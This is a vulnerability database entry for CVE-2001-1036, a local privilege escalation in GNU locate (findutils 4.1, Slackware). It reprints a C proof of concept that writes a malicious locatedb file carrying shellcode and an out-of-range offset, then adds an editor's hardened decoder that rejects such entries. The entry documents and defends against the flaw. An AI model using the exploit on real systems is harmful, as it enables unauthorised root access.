Slackware findutils GNU locate Privilege Escalation Vulnerability

Vulnerability ID 1106455 Vulnerability type Unknown
Published 2001-08-01 Updated 2005-05-02
CVE ID CVE-2001-1036 CNNVD ID CNNVD-200108-173
Platform Linux CVSS score 7.2
|Vulnerability sources
https://www.exploit-db.com/exploits/21043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-173
|Vulnerability details
GNU locate in findutils 4.1 on Slackware 7.1 and 8.0 is vulnerable. A local user can gain privileges by means of an old-format database (locatedb) file containing an entry with an out-of-range offset, which can cause locate to write to arbitrary memory in its own process.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/3127/info

GNU locate is an application that searches file databases for file names that match user-supplied patterns.

A boundary condition error can occur when the program reads database files composed in an "old" format, produced by GNU locate prior to version 4.0 and by Unix versions of locate and find. If an attacker is able to write a malicious entry to a database file used by other users, the attacker could cause arbitrary code to be executed by another user when the user runs the locate program.

It should also be noted that in earlier versions of Slackware (circa 3.5) the file is written by the superuser.

#include <stdio.h>

/* PoC from the original advisory: writes a crafted old-format locatedb image
 * to stdout (256-byte table, then entries carrying an out-of-range count). */
char shellcode[] =
   "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
   "\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80"
   "\xe8\xe3\xff\xff\xff/tmp/xx";
char putshell[] =
   "\x14\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c"
   "\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96";

int main(void)
{
   int i;
   int z0=0; int addr=0x0804a970;
   int z1=0; int addr2=-626;
   int z2=0; int addr3=addr+6;
   printf("%s", &addr);
   printf("%s", &addr3);
   printf("%s",shellcode);
   fflush(stdout);
   for(i=46;i<256;i++) putchar('A');
   printf("%s", putshell);
   fflush(stdout);
   putchar(0);
   putchar(30);
   printf("%s", &addr2);
   printf("\x82\x83");
   fflush(stdout);
   return 0;
}
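A defender-side counterpart added by the editor, not code from the advisory or from findutils: a hypothetical hardened reader for the old locatedb layout the PoC above emits, carrying the bounds check whose absence let an out-of-range count address memory outside the path buffer. It assumes the old format as the PoC lays it out: a 256-byte bigram table, then entries made of a count byte biased by 14 (or the escape byte 30 followed by a native int count, taken here as 4-byte little-endian), a suffix in which high-bit bytes index the bigram table, and a NUL terminator; the sample images are constructed.

```c
#include <stdint.h>
#include <string.h>
#define OLD_OFFSET  14    /* old locatedb: one-byte counts are biased by 14 */
#define OLD_ESCAPE  30    /* a native int count follows (assumed 4-byte LE here) */
#define TABLE_BYTES 256   /* 128 two-character bigrams open the file */
#define PATH_BUF    1024
char last_path[PATH_BUF];  /* most recently decoded entry, for inspection */
/* Hypothetical hardened reader (not locate's code): returns the entry count, or
 * -1 when an entry's offset leaves the path buffer or the image is truncated. */
int decode_old_locatedb(const unsigned char *db, size_t len)
{
    char path[PATH_BUF] = "";
    size_t prev_len = 0, pos = TABLE_BYTES, n;
    long count = 0, delta; int entries = 0, c;
    if (len < TABLE_BYTES) return -1;
    while (pos < len) {
        delta = db[pos++];
        if (delta == OLD_ESCAPE) {             /* escaped: full int count follows */
            if (pos + 4 > len) return -1;
            delta = (int32_t)((uint32_t)db[pos] | (uint32_t)db[pos + 1] << 8 |
                     (uint32_t)db[pos + 2] << 16 | (uint32_t)db[pos + 3] << 24);
            pos += 4;
        }
        count += delta - OLD_OFFSET;
        /* The check the vulnerable reader lacked: the kept prefix must lie inside the previous path. */
        if (count < 0 || (size_t)count > prev_len) return -1;
        for (c = -1, n = (size_t)count; pos < len && (c = db[pos++]) != 0; ) {
            if (n + 2 >= PATH_BUF) return -1;  /* a bigram appends two chars */
            if (c & 0x80) {                     /* high bit: bigram table index */
                path[n++] = (char)db[(c & 0x7f) * 2];
                path[n++] = (char)db[(c & 0x7f) * 2 + 1];
            } else path[n++] = (char)c;
        }
        if (c != 0) return -1;                  /* suffix ran past end of image */
        path[n] = '\0'; prev_len = n;
        memcpy(last_path, path, n + 1); entries++;
    }
    return entries;
}
/* Constructed samples: filler bigram table with bigram 0 = "ho", then entries.
 * GOOD decodes to /etc, /etc/passwd, /etc/hosts; BAD carries the escaped -626
 * count from the PoC above and is rejected by the bounds check. */
const unsigned char GOOD[] = "\x0e/etc\0\x12/passwd\0\x0e/\x80sts";
const unsigned char BAD[]  = "\x0e/etc\0\x1e\x8e\xfd\xff\xff/x";
int decode_sample(const unsigned char *entries, size_t elen)
{
    unsigned char db[TABLE_BYTES + 64]; memset(db, 'x', TABLE_BYTES);
    db[0] = 'h'; db[1] = 'o';
    memcpy(db + TABLE_BYTES, entries, elen);
    return decode_old_locatedb(db, TABLE_BYTES + elen);
}
```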
|References

Source: XF
Name: locate-command-execution(6932)
Link: http://xforce.iss.net/static/6932.php
Source: BID
Name: 3127
Link: http://www.securityfocus.com/bid/3127
Source: BUGTRAQ
Name: 20010801 Slackware 8.0, 7.1 Vulnerability: /usr/bin/locate
Link: http://www.securityfocus.com/archive/1/200991
Source: OSVDB
Name: 5477
Link: http://www.osvdb.org/5477